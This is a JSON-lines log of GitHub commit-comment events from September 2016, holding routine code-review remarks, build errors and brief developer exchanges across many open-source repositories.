{"id":"4513614788","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18892821,"position":7,"line":5,"path":".gitignore","commit_id":"76bc2bf7f0c4ef8df915d6de78f04d828048d82e","created_at":"2016-09-04T11:36:42Z","updated_at":"2016-09-04T11:36:42Z","body":"There maybe some conflit in tex files when push, I haven't modified them yet. For the present the modifications in tex files can be ignored, the corrections still remains in the history, I'll treat them soon after."}},"created_at":"2016-09-04T11:36:42Z"}
{"id":"4513616610","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"gustavoboiuna/EDL"},"payload":{"comment":{"id":18892825,"position":null,"line":null,"path":null,"commit_id":"4d5cd1bc698e6524f7afb9a5af01d3a83244c7be","created_at":"2016-09-04T11:38:19Z","updated_at":"2016-09-04T11:38:19Z","body":"foi sofrido mesmo??"}},"created_at":"2016-09-04T11:38:19Z"}
{"id":"4513616712","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"shpakovski/MASPreferences"},"payload":{"comment":{"id":18892827,"position":5,"line":5,"path":"Framework/MASPreferencesViewController.h","commit_id":"77bbc7c048d5ce7a016ab1d139f778eebd7bb148","created_at":"2016-09-04T11:38:24Z","updated_at":"2016-09-04T11:38:24Z","body":"This should be `#import <AppKit/AppKit.h>` — I suggest you just force-push this fixup."}},"created_at":"2016-09-04T11:38:24Z"}
{"id":"4513618097","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"shpakovski/MASPreferences"},"payload":{"comment":{"id":18892831,"position":26,"line":47,"path":"Framework/MASPreferencesWindowController.m","commit_id":"77bbc7c048d5ce7a016ab1d139f778eebd7bb148","created_at":"2016-09-04T11:39:39Z","updated_at":"2016-09-04T11:39:39Z","body":"Sorry to be pedantic, but `copy` is a method and should not be called via property syntax."}},"created_at":"2016-09-04T11:39:39Z"}
{"id":"4513619077","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18892832,"position":null,"line":null,"path":null,"commit_id":"480f1e4f1457bf2b4e4d46ff9cbc7bb1580695ae","created_at":"2016-09-04T11:40:28Z","updated_at":"2016-09-04T11:40:28Z","body":"The left out configuration # 332  is 2Q 2R 2B and 4N = 12260 \r\n\r\nI compared also with piece values before the simpleimbalance change where the\r\nthe knightValueMg was much higher\r\n330  12177\r\n331  12196\r\n332  12522\r\n333  12541\r\n334  12541\r\n335  12560\r\n\r\n# 332 was included before and after that simpleimbalance change.\r\n\r\nSo removing 332 is a new experiment ! And it might take many games to make a difference !\r\n\r\nWhatever the outcome, it might make sense to replace (or document) the constant with the piece configuration."}},"created_at":"2016-09-04T11:40:28Z"}
{"id":"4513619086","type":"CommitCommentEvent","actor":{"login":"satterly"},"repo":{"name":"been2io/alerta"},"payload":{"comment":{"id":18892833,"position":null,"line":null,"path":null,"commit_id":"12c3d7f335805b1e354b5542617e45dcd810b7be","created_at":"2016-09-04T11:40:29Z","updated_at":"2016-09-04T11:40:29Z","body":"This is already supported if you use `MONGO_URI` see https://github.com/guardian/alerta/blob/master/alerta/app/database.py#L34"}},"created_at":"2016-09-04T11:40:29Z"}
{"id":"4513619111","type":"CommitCommentEvent","actor":{"login":"shpakovski"},"repo":{"name":"shpakovski/MASPreferences"},"payload":{"comment":{"id":18892834,"position":5,"line":5,"path":"Framework/MASPreferencesViewController.h","commit_id":"77bbc7c048d5ce7a016ab1d139f778eebd7bb148","created_at":"2016-09-04T11:40:30Z","updated_at":"2016-09-04T11:40:30Z","body":"What a shame, sorry!"}},"created_at":"2016-09-04T11:40:30Z"}
{"id":"4513620202","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892837,"position":7,"line":7,"path":"package.json","commit_id":"16d43e98f5676a1b76c9527dc3654a4c64902c45","created_at":"2016-09-04T11:41:31Z","updated_at":"2016-09-04T11:41:31Z","body":"@angy113 , make sure to fix... as we have seen in classes no test will be executed if I execute that command line"}},"created_at":"2016-09-04T11:41:31Z"}
{"id":"4513620770","type":"CommitCommentEvent","actor":{"login":"navyad"},"repo":{"name":"gunthercox/ChatterBot"},"payload":{"comment":{"id":18892838,"position":null,"line":null,"path":null,"commit_id":"30c2eec2e68b8ae4426771194cf8789adcd3d5e9","created_at":"2016-09-04T11:42:02Z","updated_at":"2016-09-04T11:42:02Z","body":"@gunthercox  [https://github.com/gunthercox/ChatterBot/pull/275](https://github.com/gunthercox/ChatterBot/pull/275) for above pointed case "}},"created_at":"2016-09-04T11:42:02Z"}
{"id":"4513621187","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18892839,"position":null,"line":null,"path":null,"commit_id":"e8f73186aa4af57e0c912163ae3b58b9a3220cda","created_at":"2016-09-04T11:42:24Z","updated_at":"2016-09-04T11:42:24Z","body":":)"}},"created_at":"2016-09-04T11:42:24Z"}
{"id":"4513621954","type":"CommitCommentEvent","actor":{"login":"shpakovski"},"repo":{"name":"shpakovski/MASPreferences"},"payload":{"comment":{"id":18892842,"position":26,"line":47,"path":"Framework/MASPreferencesWindowController.m","commit_id":"77bbc7c048d5ce7a016ab1d139f778eebd7bb148","created_at":"2016-09-04T11:43:03Z","updated_at":"2016-09-04T11:43:03Z","body":"No problem, fixed!"}},"created_at":"2016-09-04T11:43:03Z"}
{"id":"4513622824","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"shpakovski/MASPreferences"},"payload":{"comment":{"id":18892843,"position":26,"line":47,"path":"Framework/MASPreferencesWindowController.m","commit_id":"77bbc7c048d5ce7a016ab1d139f778eebd7bb148","created_at":"2016-09-04T11:43:53Z","updated_at":"2016-09-04T11:43:53Z","body":"There is also a mutableCopy called via dot-syntax in the removal of MRC \ncommit.\n\nOn 4 Sep 2016, at 13:43, Vadim Shpakovski wrote:\n\n> No problem, fixed!\n>\n> -- \n> You are receiving this because you commented.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/shpakovski/MASPreferences/commit/77bbc7c048d5ce7a016ab1d139f778eebd7bb148#commitcomment-18892842\n\n\n"}},"created_at":"2016-09-04T11:43:53Z"}
{"id":"4513623012","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892844,"position":3,"line":1,"path":"README.md","commit_id":"16d43e98f5676a1b76c9527dc3654a4c64902c45","created_at":"2016-09-04T11:44:05Z","updated_at":"2016-09-04T11:44:05Z","body":"@angy113 probably you guys want to add some description to this readme .... something saying that the framework it is being refactored, mentioned the areas that were being worked."}},"created_at":"2016-09-04T11:44:05Z"}
{"id":"4513624008","type":"CommitCommentEvent","actor":{"login":"jiegemena"},"repo":{"name":"jiegemena/MyPhp"},"payload":{"comment":{"id":18892845,"position":null,"line":null,"path":null,"commit_id":"d14c58c11b816ea11af42bdb54b5a072e43a5387","created_at":"2016-09-04T11:44:57Z","updated_at":"2016-09-04T11:44:57Z","body":"first"}},"created_at":"2016-09-04T11:44:57Z"}
{"id":"4513624093","type":"CommitCommentEvent","actor":{"login":"kularny"},"repo":{"name":"DirtyUnicorns/android_vendor_du"},"payload":{"comment":{"id":18892846,"position":null,"line":null,"path":null,"commit_id":"8cf0dc67b0479f7053a7b1675d7e9a6d91f049f6","created_at":"2016-09-04T11:45:01Z","updated_at":"2016-09-04T11:45:01Z","body":"Nope.... This\r\n\r\n# Stagefright FFMPEG plugin\r\n ifneq ($(BOARD_USES_QCOM_HARDWARE),true)\r\n\r\nwas purely my concept...Though I did maintain original author of steve. You can check in the FFMPEG tutorial too...I did tag u there after committing it."}},"created_at":"2016-09-04T11:45:01Z"}
{"id":"4513624730","type":"CommitCommentEvent","actor":{"login":"shpakovski"},"repo":{"name":"shpakovski/MASPreferences"},"payload":{"comment":{"id":18892847,"position":26,"line":47,"path":"Framework/MASPreferencesWindowController.m","commit_id":"77bbc7c048d5ce7a016ab1d139f778eebd7bb148","created_at":"2016-09-04T11:45:34Z","updated_at":"2016-09-04T11:45:34Z","body":"You are right 👍"}},"created_at":"2016-09-04T11:45:34Z"}
{"id":"4513626215","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18892850,"position":null,"line":null,"path":null,"commit_id":"69bed218373b3f93671f65bc3d02c45cbf683a48","created_at":"2016-09-04T11:46:54Z","updated_at":"2016-09-04T11:46:54Z","body":"@rduivenvoorde,\r\n\r\nIMHO, there is nothing to fix in QGIS, here. If a layer defines no style, it's wanted that it inherits the parent layer's style. Have a look at chapter 7.2.4.6.5 of the WMS implementation specification:\r\n```\r\nStyle declarations are inherited by child Layers. A child shall not redefine a Style with the same Name as one\r\ninherited from a parent. A child may define a new Style with a new Name that is not available for the parent Layer. \r\n```\r\n\r\nThis PR is just a workaround for MapServer that is defining a style named `default` for both the parent and the child layers. This was making QGIS show 2 `default` styles for every child layers. Style inheritance was already there before. Now at has just a saner behavior in regard to non-standard compliant servers.\r\n\r\nI'll let you forward that to the user ML. I was not subscribed to it and therefore cannot reply directly to the thread.\r\n\r\nThanks."}},"created_at":"2016-09-04T11:46:54Z"}
{"id":"4513626417","type":"CommitCommentEvent","actor":{"login":"z496090280"},"repo":{"name":"z496090280/-"},"payload":{"comment":{"id":18892851,"position":null,"line":null,"path":null,"commit_id":"97b1ab7f3ece77702424eda5b1123b857dc0a2f5","created_at":"2016-09-04T11:47:04Z","updated_at":"2016-09-04T11:47:04Z","body":"真尼玛难搞啊，gay 吗吗吗！！！"}},"created_at":"2016-09-04T11:47:04Z"}
{"id":"4513627480","type":"CommitCommentEvent","actor":{"login":"rofl0r"},"repo":{"name":"Melli17/sabotage"},"payload":{"comment":{"id":18892855,"position":null,"line":null,"path":null,"commit_id":"2e7f5d2f31f0cde8337253087c86c47b33894faa","created_at":"2016-09-04T11:48:00Z","updated_at":"2016-09-04T11:48:00Z","body":"did you test to build this ? afaik kbuild based config files work not in a y/n way as you would expect.\r\nit's either `FEATURE=y` or `#FEATURE_IS_COMMENTED_OUT is not set`"}},"created_at":"2016-09-04T11:48:00Z"}
{"id":"4513628957","type":"CommitCommentEvent","actor":{"login":"banalg"},"repo":{"name":"dart-league/ng_bootstrap"},"payload":{"comment":{"id":18892857,"position":15,"line":57,"path":"lib/components/tabsx/tabsx.dart","commit_id":"c04dd43068260ad6cec9ba46981366020dbfde41","created_at":"2016-09-04T11:49:16Z","updated_at":"2016-09-04T11:49:16Z","body":"Thanks, its working again now !"}},"created_at":"2016-09-04T11:49:16Z"}
{"id":"4513630381","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_vendor_du"},"payload":{"comment":{"id":18892861,"position":null,"line":null,"path":null,"commit_id":"8cf0dc67b0479f7053a7b1675d7e9a6d91f049f6","created_at":"2016-09-04T11:50:32Z","updated_at":"2016-09-04T11:50:32Z","body":"I didn't get any tag but alright, I don't have time for this right now. I'll look into rebasing this later so you can bask in your glory of a ifneq. Unbelievable, next people will want credit for string changes....."}},"created_at":"2016-09-04T11:50:32Z"}
{"id":"4513631320","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18892863,"position":null,"line":null,"path":null,"commit_id":"45feb21cda920759480f1d2e00728402a3f3255b","created_at":"2016-09-04T11:51:27Z","updated_at":"2016-09-04T11:51:27Z","body":"```\r\n> /home/jenkins/jenkins_slave/workspace/AndroidN-ify/app/src/main/res/values-ar-rSA/strings.xml:197:4: Error: Open quote is expected for attribute \"id\" associated with an  element type  \"xliff:g\".\r\n  /home/jenkins/jenkins_slave/workspace/AndroidN-ify/app/src/main/res/values-zh-rCN/strings.xml:216:26: Error: Element type \"xliff:g\" must be followed by either attribute specifications, \">\" or \"/>\".\r\n  /home/jenkins/jenkins_slave/workspace/AndroidN-ify/app/src/main/res/values-ru-rRU/strings.xml:157:84: Error: The element type \"plurals\" must be terminated by the matching end-tag \"</plurals>\".\r\n\r\n```\r\n\r\nThese caused build failure. I fixed zh-rCN."}},"created_at":"2016-09-04T11:51:27Z"}
{"id":"4513631355","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892864,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T11:51:30Z","updated_at":"2016-09-04T11:51:30Z","body":"Hm, this sounds undesirable to me because we probably want to keep `/run` in general `nosuid`. Maybe we want to do it like this: return `/var/setuid-wrappers`, but place wrappers in `/var/setuid-wrappers/bin` and create temporary directories for atomic replacement in `/var/setuid-wrappers`."}},"created_at":"2016-09-04T11:51:30Z"}
{"id":"4513632013","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"JemilleMartins/EDL"},"payload":{"comment":{"id":18892865,"position":null,"line":null,"path":null,"commit_id":"08ca2cc5523a02fe395e599e473e62cbedab2d9d","created_at":"2016-09-04T11:52:11Z","updated_at":"2016-09-04T11:52:11Z","body":"A avaliação está muito descritiva e genérica e pouco crítica e específica. Gostaria de exemplos mais concretos que justifiquem os argumentos da avaliação.\r\nO exemplo de código não é \"representativo\" da linguagem, ou seja, não explora as características especiais de Ruby (i.e., qualquer linguagem tem `if` e `puts`).\r\nO código não está formatado corretamente (não tem indentação):\r\nhttps://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet#code"}},"created_at":"2016-09-04T11:52:11Z"}
{"id":"4513632431","type":"CommitCommentEvent","actor":{"login":"cupnes"},"repo":{"name":"cupnes/os5"},"payload":{"comment":{"id":18892867,"position":null,"line":null,"path":null,"commit_id":"5263a0926aae9b49447bbd9d5db5e13d066fc5c2","created_at":"2016-09-04T11:52:35Z","updated_at":"2016-09-04T11:52:35Z","body":"> schedule()呼び出し元では次に実行するタスクを知る術は無い。\r\n\r\nというポリシーだったと思っていたが、例えばアラームでのタスク起床を実現するwakeup_after_msec()には、[current_taskのnextメンバーを参照し、コンテキストスイッチ先のタスクを取得しようとしている処理がある](https://github.com/cupnes/os5/blob/master/kernel/sched.c#L191)。\r\n\r\nポリシーがブレている。。"}},"created_at":"2016-09-04T11:52:35Z"}
{"id":"4513632689","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892868,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T11:52:49Z","updated_at":"2016-09-04T11:52:49Z","body":"@abbradar that's also not ideal since one might want `/` to be `nosuid`. "}},"created_at":"2016-09-04T11:52:49Z"}
{"id":"4513632873","type":"CommitCommentEvent","actor":{"login":"ryu3dy"},"repo":{"name":"opendata-app/area-information"},"payload":{"comment":{"id":18892869,"position":null,"line":null,"path":null,"commit_id":"de21cd677d0d8375a4db6ef7f07c9dc8c7f6a4c1","created_at":"2016-09-04T11:52:59Z","updated_at":"2016-09-04T11:52:59Z","body":"aaa"}},"created_at":"2016-09-04T11:52:59Z"}
{"id":"4513633948","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892874,"position":6,"line":8,"path":"lib/RequestManager/manager_location.js","commit_id":"39b34a5cce1d6502b4bafed86baee376daa65b2b","created_at":"2016-09-04T11:54:00Z","updated_at":"2016-09-04T11:54:00Z","body":"for me it would sound to have setModule() instead of defineModule()"}},"created_at":"2016-09-04T11:54:00Z"}
{"id":"4513634401","type":"CommitCommentEvent","actor":{"login":"goldragoon"},"repo":{"name":"UtopiaSoftware/PatientManagementSystem"},"payload":{"comment":{"id":18892875,"position":16,"line":20,"path":"views/searchPatients.pug","commit_id":"fa5408cc3c6648bf5ae816dd4bd0fbe44564d152","created_at":"2016-09-04T11:54:21Z","updated_at":"2016-09-04T11:54:21Z","body":"res Object is not exists in this context. \r\nThis is pug file.\r\n"}},"created_at":"2016-09-04T11:54:21Z"}
{"id":"4513634814","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18892878,"position":null,"line":null,"path":null,"commit_id":"dc8a8638193fc50b7368f3db5438aefe071202ea","created_at":"2016-09-04T11:54:45Z","updated_at":"2016-09-04T11:54:45Z","body":"I don't know if you have seen my comment on the tune_futility repo.\r\nYou have setup the spsa-tuning test wrong. To work properly the tuning branch is matched against itself, not the master. So in effect a random walk in parameter space was done in your spsa run.."}},"created_at":"2016-09-04T11:54:45Z"}
{"id":"4513636623","type":"CommitCommentEvent","actor":{"login":"tgqnanman"},"repo":{"name":"tgqnanman/text-text"},"payload":{"comment":{"id":18892882,"position":null,"line":null,"path":null,"commit_id":"0bfadfeeed562528712bb86526b08d585bb84559","created_at":"2016-09-04T11:56:16Z","updated_at":"2016-09-04T11:56:16Z","body":"可以，在哪看的"}},"created_at":"2016-09-04T11:56:16Z"}
{"id":"4513637502","type":"CommitCommentEvent","actor":{"login":"AlexSheer"},"repo":{"name":"AlexSheer/phpbb3.1-Connection-Log"},"payload":{"comment":{"id":18892883,"position":null,"line":null,"path":null,"commit_id":"b2a0795744dd20c70708dcbce356f9c2c7a97a2a","created_at":"2016-09-04T11:57:06Z","updated_at":"2016-09-04T11:57:06Z","body":"Fix bug described at http://www.phpbbguru.net/community/viewtopic.php?f=64&t=43557&p=491118#p488731"}},"created_at":"2016-09-04T11:57:06Z"}
{"id":"4513638915","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"mafintosh/k-rpc"},"payload":{"comment":{"id":18892884,"position":5,"line":12,"path":"package.json","commit_id":"f23037a9be7b29de476faf01fbeb3cc277e8bad3","created_at":"2016-09-04T11:58:28Z","updated_at":"2016-09-04T11:58:28Z","body":"Sorry -- bad commit message.\r\n\r\nI just updated all my packages (and I guess some of yours too) to always install the latest version of standard. I released standard v8 last week and I want to dog food it across as much as possible :)\r\n\r\nFeel free to revert this, or lock to a range if you want.\r\n\r\n"}},"created_at":"2016-09-04T11:58:28Z"}
{"id":"4513639400","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"Blacktempel/cryptopp"},"payload":{"comment":{"id":18892886,"position":null,"line":null,"path":null,"commit_id":"a11985e6e464043268427d34ada6b55aed76f688","created_at":"2016-09-04T11:58:57Z","updated_at":"2016-09-04T11:58:57Z","body":"Do we need to revisit this from around line 80:\r\n\r\n```\r\n#if defined(__BORLANDC__)\r\n\t\tif (rounds < MIN_ROUNDS || rounds > MAX_ROUNDS)\r\n\t\t\tthrow InvalidRounds(alg ? alg->AlgorithmName() : std::string(\"VariableRounds\"), rounds);\r\n#elif (M==INT_MAX)\t// Coverity and result_independent_of_operands\r\n\t\tif (rounds < MIN_ROUNDS)\r\n\t\t\tthrow InvalidRounds(alg ? alg->AlgorithmName() : \"VariableRounds\", rounds);\t\r\n#else\r\n\t\tif (rounds < MIN_ROUNDS || rounds > MAX_ROUNDS)\r\n\t\t\tthrow InvalidRounds(alg ? alg->AlgorithmName() : \"VariableRounds\", rounds);\r\n#endif\r\n```\r\n\r\nThe `M==INT_MAX` is another area that produced analysis findings."}},"created_at":"2016-09-04T11:58:57Z"}
{"id":"4513639771","type":"CommitCommentEvent","actor":{"login":"svanderburg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892889,"position":null,"line":null,"path":null,"commit_id":"1f7dfda8b86ab86be0df0b78ffb9d00cb2546f5f","created_at":"2016-09-04T11:59:19Z","updated_at":"2016-09-04T11:59:19Z","body":"I can easily replace this with a node2nix generated package set. I noticed that despite fixing the evaluation, the build fails because lens-4.14 is broken."}},"created_at":"2016-09-04T11:59:19Z"}
{"id":"4513639893","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892890,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T11:59:25Z","updated_at":"2016-09-04T11:59:25Z","body":"@abbradar but `/run` is not world writeable, except for some socket files."}},"created_at":"2016-09-04T11:59:25Z"}
{"id":"4513640362","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_vendor_du"},"payload":{"comment":{"id":18892892,"position":null,"line":null,"path":null,"commit_id":"8cf0dc67b0479f7053a7b1675d7e9a6d91f049f6","created_at":"2016-09-04T11:59:49Z","updated_at":"2016-09-04T11:59:49Z","body":"There @kularny you're the coolest now!!!\r\n\r\nhttps://github.com/DirtyUnicorns/android_vendor_du/commit/b62aa406e688e8bd530575de35b54c17d54d4bde"}},"created_at":"2016-09-04T11:59:49Z"}
{"id":"4513641525","type":"CommitCommentEvent","actor":{"login":"Swailem95"},"repo":{"name":"Mshokrr/Arabesque"},"payload":{"comment":{"id":18892893,"position":4,"line":21,"path":"public/partials/dashboard.html","commit_id":"4fb20cfe8162fee5b58dd3751cfe8b5a5ccc0f21","created_at":"2016-09-04T12:00:34Z","updated_at":"2016-09-04T12:00:34Z","body":"Good idea."}},"created_at":"2016-09-04T12:00:34Z"}
{"id":"4513644599","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892895,"position":18,"line":33,"path":"test/CRUD/crud_attendees.js","commit_id":"39b34a5cce1d6502b4bafed86baee376daa65b2b","created_at":"2016-09-04T12:03:14Z","updated_at":"2016-09-04T12:03:14Z","body":"@angy113 \r\nIt would be interesting if this piece of code is moved to another place like utils probably, where it get the total number of presents.\r\n\r\nthis way we remove from this part it is more understable for the poeple that it is reading it"}},"created_at":"2016-09-04T12:03:14Z"}
{"id":"4513646267","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892898,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T12:04:42Z","updated_at":"2016-09-04T12:04:42Z","body":"I would also prefer to keep `/run` `nosuid` to avoid diverging from other distros (as that's the new systemd default)."}},"created_at":"2016-09-04T12:04:42Z"}
{"id":"4513646348","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892899,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T12:04:46Z","updated_at":"2016-09-04T12:04:46Z","body":"Hm, we had it mounted as tmpfs and AFAIR nosuid is not inherited to nested mount points... \n\nOn September 4, 2016 2:52:53 PM GMT+03:00, \"Domen Kožar\" <notifications@github.com> wrote:\n>@abbradar that's also not ideal since one might want `/` to be\n>`nosuid`. \n>\n>-- \n>You are receiving this because you were mentioned.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/NixOS/nixpkgs/commit/8d977ead386cf29b8b395caca536bfaec9c36efe#commitcomment-18892868\n\n-- \nNikolay. \n\nSent from a mobile device, please excuse my brevity."}},"created_at":"2016-09-04T12:04:46Z"}
{"id":"4513646359","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":18892900,"position":null,"line":null,"path":null,"commit_id":"ea18f3265c4b3fb65bf73afee8ab1337d939b005","created_at":"2016-09-04T12:04:47Z","updated_at":"2016-09-04T12:04:47Z","body":"@k-plan \r\n\r\n> but Temp-readout-fix\r\n\r\nYep, have a pull request with pihole, not merged yet: https://github.com/pi-hole/AdminLTE/pull/129\r\n\r\nI've updated ours with the fix: https://github.com/Fourdee/AdminLTE/commit/dbf561b01ac919bbf91ee7f676e67b152831eac3"}},"created_at":"2016-09-04T12:04:47Z"}
{"id":"4513649559","type":"CommitCommentEvent","actor":{"login":"tavisca-mbhanushali"},"repo":{"name":"tavisca-mbhanushali/UserManagementSystem"},"payload":{"comment":{"id":18892905,"position":null,"line":null,"path":null,"commit_id":"a8dceef1bd980c803dfdbeb7311bc5768b788e0a","created_at":"2016-09-04T12:07:30Z","updated_at":"2016-09-04T12:07:30Z","body":"Added code changes."}},"created_at":"2016-09-04T12:07:30Z"}
{"id":"4513650618","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892906,"position":2,"line":2,"path":"lib/RequestManager/manager.js","commit_id":"30a8cec74c76579cefb9476b4d611523a9c06506","created_at":"2016-09-04T12:08:26Z","updated_at":"2016-09-04T12:08:26Z","body":"is this still valid? what it is the public key?"}},"created_at":"2016-09-04T12:08:26Z"}
{"id":"4513650807","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892907,"position":null,"line":null,"path":null,"commit_id":"03c0d4de6ac2ff05d578bbe66df750625f19b1f8","created_at":"2016-09-04T12:08:39Z","updated_at":"2016-09-04T12:08:39Z","body":"did #19 \r\ndid #13 \r\ndid #10 \r\ndid #6 "}},"created_at":"2016-09-04T12:08:39Z"}
{"id":"4513651153","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892908,"position":null,"line":null,"path":null,"commit_id":"733129c34ba9b018a1f9db6b7516accea7d96083","created_at":"2016-09-04T12:08:59Z","updated_at":"2016-09-04T12:08:59Z","body":"did #17 "}},"created_at":"2016-09-04T12:08:59Z"}
{"id":"4513651415","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892910,"position":null,"line":null,"path":null,"commit_id":"d390ed5807b1df3eeb0bbbd09ff2263b8cbc9db8","created_at":"2016-09-04T12:09:14Z","updated_at":"2016-09-04T12:09:14Z","body":"did #19 "}},"created_at":"2016-09-04T12:09:14Z"}
{"id":"4513651724","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892911,"position":null,"line":null,"path":null,"commit_id":"d5d42ba1ade1a16fd68b5e0b84d5166b71bf58aa","created_at":"2016-09-04T12:09:28Z","updated_at":"2016-09-04T12:09:28Z","body":"did #17 "}},"created_at":"2016-09-04T12:09:28Z"}
{"id":"4513651979","type":"CommitCommentEvent","actor":{"login":"upegelow"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":18892912,"position":208,"line":776,"path":"src/iop/shadhi.c","commit_id":"2cd643196e555d9020cb4cd046463338dd6c6caa","created_at":"2016-09-04T12:09:40Z","updated_at":"2016-09-04T12:09:40Z","body":"Could be extended, but based on my tests with values exceeding the [-10, +10] range more and more artifacts will come up. I have noticed some criticism on darktable (mainly compared to Lightroom) that its extreme settings frequently lead to insane results. Soft bounds could be an option though."}},"created_at":"2016-09-04T12:09:40Z"}
{"id":"4513652282","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892913,"position":null,"line":null,"path":null,"commit_id":"9675569a9185dffd122c17979f06cc7d20f309ba","created_at":"2016-09-04T12:09:56Z","updated_at":"2016-09-04T12:09:56Z","body":"did #19 "}},"created_at":"2016-09-04T12:09:56Z"}
{"id":"4513652305","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892914,"position":44,"line":53,"path":"test/CRUD/crud_service_room_resourceTest.js","commit_id":"30a8cec74c76579cefb9476b4d611523a9c06506","created_at":"2016-09-04T12:09:58Z","updated_at":"2016-09-04T12:09:58Z","body":"move this to a function in utils probably that handels lists"}},"created_at":"2016-09-04T12:09:58Z"}
{"id":"4513652565","type":"CommitCommentEvent","actor":{"login":"azekillDIABLO"},"repo":{"name":"cdqwertz/rpgtest"},"payload":{"comment":{"id":18892916,"position":24,"line":320,"path":"mods/default/craft.lua","commit_id":"219817235e1a6bfc6ebe992bea0feae94166caaa","created_at":"2016-09-04T12:10:11Z","updated_at":"2016-09-04T12:10:11Z","body":"cool!"}},"created_at":"2016-09-04T12:10:11Z"}
{"id":"4513652692","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892917,"position":null,"line":null,"path":null,"commit_id":"82ad805faf73c9150735f1a6691497c5fccb2900","created_at":"2016-09-04T12:10:16Z","updated_at":"2016-09-04T12:10:16Z","body":"did #5 "}},"created_at":"2016-09-04T12:10:16Z"}
{"id":"4513652909","type":"CommitCommentEvent","actor":{"login":"azekillDIABLO"},"repo":{"name":"cdqwertz/rpgtest"},"payload":{"comment":{"id":18892918,"position":null,"line":null,"path":null,"commit_id":"219817235e1a6bfc6ebe992bea0feae94166caaa","created_at":"2016-09-04T12:10:27Z","updated_at":"2016-09-04T12:10:27Z","body":"+1"}},"created_at":"2016-09-04T12:10:27Z"}
{"id":"4513654452","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892921,"position":null,"line":null,"path":null,"commit_id":"b9b0b86607412320c99a6953e51f9e733a0a8a74","created_at":"2016-09-04T12:11:49Z","updated_at":"2016-09-04T12:11:49Z","body":"did #20 "}},"created_at":"2016-09-04T12:11:49Z"}
